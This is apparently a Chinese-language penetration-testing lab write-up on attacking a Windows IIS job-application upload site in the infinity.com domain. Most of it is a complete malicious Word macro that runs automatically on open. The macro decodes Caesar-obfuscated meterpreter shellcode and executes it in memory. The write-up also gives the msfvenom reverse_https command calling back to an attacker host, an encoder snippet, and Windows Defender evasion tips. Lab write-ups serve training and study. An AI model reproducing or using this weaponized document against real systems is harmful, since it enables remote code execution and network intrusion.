命令:nmap -A -Pn 192.168.243.121
Nmap initial output
Nmap scan report for 192.168.243.121
Host is up (0.21s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
**80/tcp open http Microsoft IIS httpd 10.0**
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Job Application Upload Site
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2022-07-09T13:38:14+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=web05.infinity.com
| Not valid before: 2022-06-19T00:57:09
|_Not valid after: 2022-12-19T00:57:09
| rdp-ntlm-info:
| Target_Name: INFINITY
| NetBIOS_Domain_Name: INFINITY
| NetBIOS_Computer_Name: WEB05
**| DNS_Domain_Name: infinity.com
| DNS_Computer_Name: web05.infinity.com
| DNS_Tree_Name: infinity.com**
| Product_Version: 10.0.17763
|_ System_Time: 2022-07-09T13:37:33+00:00
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP (85%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3
Aggressive OS guesses: Microsoft Windows XP SP3 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-07-09T13:37:39
|_ start_date: N/A
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 211.98 ms 192.168.49.1
2 212.07 ms 192.168.243.121
可以发现,开启了80端口,从3389端口的信息可知本机的名字为web05.infinity.com,所在域为infinity.com。
访问80端口:
发现这里存在一个上传点。告诉我们需要上传一个word文档,第一反应这里是macro的利用。
查看dev机器可以知道,word为32位。本地测试:ppid spoof 32位版本结合vba Pears混淆(P208)可以过dev机器的Windows Defender,并且能够正常反弹shell。
上传测试好的word文档到121,无反弹,可能存在CLM。
msf exploit/multi/handler设置的时候,加上set AutoRunScript "migrate -n explorer.exe"。免得后续得到的shell不稳定。
这里word的macro使用vba runner,shellcode使用Caesar加密。
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
Sub Rev()
Dim buf As Variant
Dim addr As LongPtr
Dim counter As Long
Dim data As Long
Dim res As Long
buf = Array(254, 234, 145, 2, 2, 2, 98, 51, 212, 102, 141, 84, 50, 139, 231, 141, 84, 14, 141, 84, 22, 51, 1, 141, 116, 42, 17, 185, 76, 40, 51, 194, 174, 62, 99, 126, 4, 46, 34, 195, 209, 15, 3, 201, 75, 119, 241, 84, 141, 84, _
18, 141, 68, 62, 3, 210, 89, 141, 66, 122, 135, 194, 118, 78, 3, 210, 82, 141, 90, 34, 3, 213, 141, 74, 26, 135, 203, 118, 62, 51, 1, 75, 141, 54, 141, 3, 216, 51, 194, 174, 195, 209, 15, 3, 201, 58, 226, 119, 246, 5, _
127, 250, 61, 127, 38, 119, 226, 90, 141, 90, 38, 3, 213, 104, 141, 14, 77, 141, 90, 30, 3, 213, 141, 6, 141, 3, 210, 139, 70, 38, 38, 93, 93, 99, 91, 92, 83, 1, 226, 90, 97, 92, 141, 20, 235, 130, 1, 1, 1, 95, _
106, 112, 103, 118, 2, 106, 121, 107, 112, 107, 86, 106, 78, 121, 40, 9, 1, 215, 51, 221, 85, 85, 85, 85, 85, 234, 134, 2, 2, 2, 79, 113, 124, 107, 110, 110, 99, 49, 55, 48, 50, 34, 42, 89, 107, 112, 102, 113, 121, 117, _
34, 80, 86, 34, 51, 50, 48, 50, 61, 34, 89, 107, 112, 56, 54, 61, 34, 122, 56, 54, 43, 34, 67, 114, 114, 110, 103, 89, 103, 100, 77, 107, 118, 49, 55, 53, 57, 48, 53, 56, 34, 42, 77, 74, 86, 79, 78, 46, 34, 110, _
107, 109, 103, 34, 73, 103, 101, 109, 113, 43, 34, 69, 106, 116, 113, 111, 103, 49, 59, 58, 48, 50, 48, 54, 57, 55, 58, 48, 58, 51, 34, 85, 99, 104, 99, 116, 107, 49, 55, 53, 57, 48, 53, 56, 34, 71, 102, 105, 49, 59, _
57, 48, 50, 48, 51, 50, 57, 52, 48, 56, 59, 2, 106, 60, 88, 123, 169, 1, 215, 85, 85, 108, 5, 85, 85, 106, 189, 3, 2, 2, 234, 67, 3, 2, 2, 49, 115, 105, 81, 115, 67, 101, 112, 73, 79, 121, 99, 47, 121, 57, _
97, 69, 53, 67, 106, 83, 115, 121, 78, 81, 113, 87, 54, 69, 73, 58, 114, 59, 97, 92, 87, 76, 113, 90, 107, 121, 116, 58, 79, 101, 122, 121, 80, 87, 71, 80, 88, 89, 102, 76, 91, 111, 86, 111, 109, 84, 120, 76, 123, 83, _
51, 71, 112, 107, 57, 80, 77, 55, 101, 82, 118, 82, 115, 79, 70, 51, 69, 81, 88, 55, 47, 54, 84, 78, 82, 99, 102, 115, 67, 102, 104, 75, 59, 91, 56, 53, 105, 112, 92, 85, 88, 84, 110, 110, 75, 121, 77, 82, 70, 114, _
72, 104, 90, 103, 108, 88, 80, 54, 109, 59, 50, 56, 84, 120, 83, 56, 53, 89, 121, 122, 116, 51, 83, 123, 88, 78, 103, 81, 78, 106, 73, 91, 124, 115, 80, 85, 70, 80, 79, 116, 81, 115, 50, 67, 90, 82, 102, 54, 78, 100, _
121, 117, 67, 71, 121, 102, 121, 74, 69, 124, 114, 76, 2, 82, 106, 89, 139, 161, 200, 1, 215, 139, 200, 85, 106, 2, 52, 234, 134, 85, 85, 85, 89, 85, 88, 106, 237, 87, 48, 61, 1, 215, 152, 108, 12, 97, 106, 130, 53, 2, _
2, 139, 226, 108, 6, 82, 108, 33, 88, 106, 119, 72, 160, 136, 1, 215, 85, 85, 85, 85, 88, 106, 47, 8, 26, 125, 1, 215, 135, 194, 119, 22, 106, 138, 21, 2, 2, 106, 70, 242, 55, 226, 1, 215, 81, 119, 207, 234, 77, 2, _
2, 2, 108, 66, 106, 2, 18, 2, 2, 106, 2, 2, 66, 2, 85, 106, 90, 166, 85, 231, 1, 215, 149, 85, 85, 139, 233, 89, 106, 2, 34, 2, 2, 85, 88, 106, 20, 152, 139, 228, 1, 215, 135, 194, 118, 209, 141, 9, 3, 197, _
135, 194, 119, 231, 90, 197, 97, 234, 109, 1, 1, 1, 51, 59, 52, 48, 51, 56, 58, 48, 54, 59, 48, 52, 54, 53, 2, 189, 242, 183, 164, 88, 108, 2, 85, 1, 215)
**For i = 0 To UBound(buf)
buf(i) = buf(i) - 2
Next i**
addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
For counter = LBound(buf) To UBound(buf)
data = buf(counter)
res = RtlMoveMemory(addr + counter, data, 1)
Next counter
res = CreateThread(0, 0, addr, 0, 0, 0)
End Sub
Sub Document_Open()
Rev
End Sub
Sub AutoOpen()
Rev
End Sub
上面代码中标红加粗的代码为Caesar的解密部分。
msfvenom生成windows/meterpreter/reverse_https shellcode的命令如下:msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.49.243 LPORT=443 -f csharp
然后将生成的shellcode放入Caesar加密程序,注意返回值需要符合vba的格式:
foreach (byte b in encoded)
{
hex.AppendFormat("{0:D}, ", b);
counter++;
if (counter % 50 == 0)
{
hex.AppendFormat("_{0}", Environment.NewLine);
}
}
这里有点奇怪:在dev机器上,构造的macro运行的时候被杀了,但是上传点上传成功之后,确又能返回shell。
返回的shell如下:
发现返回的主机地址是192.168.243.122,并非开80端口的192.168.243.121。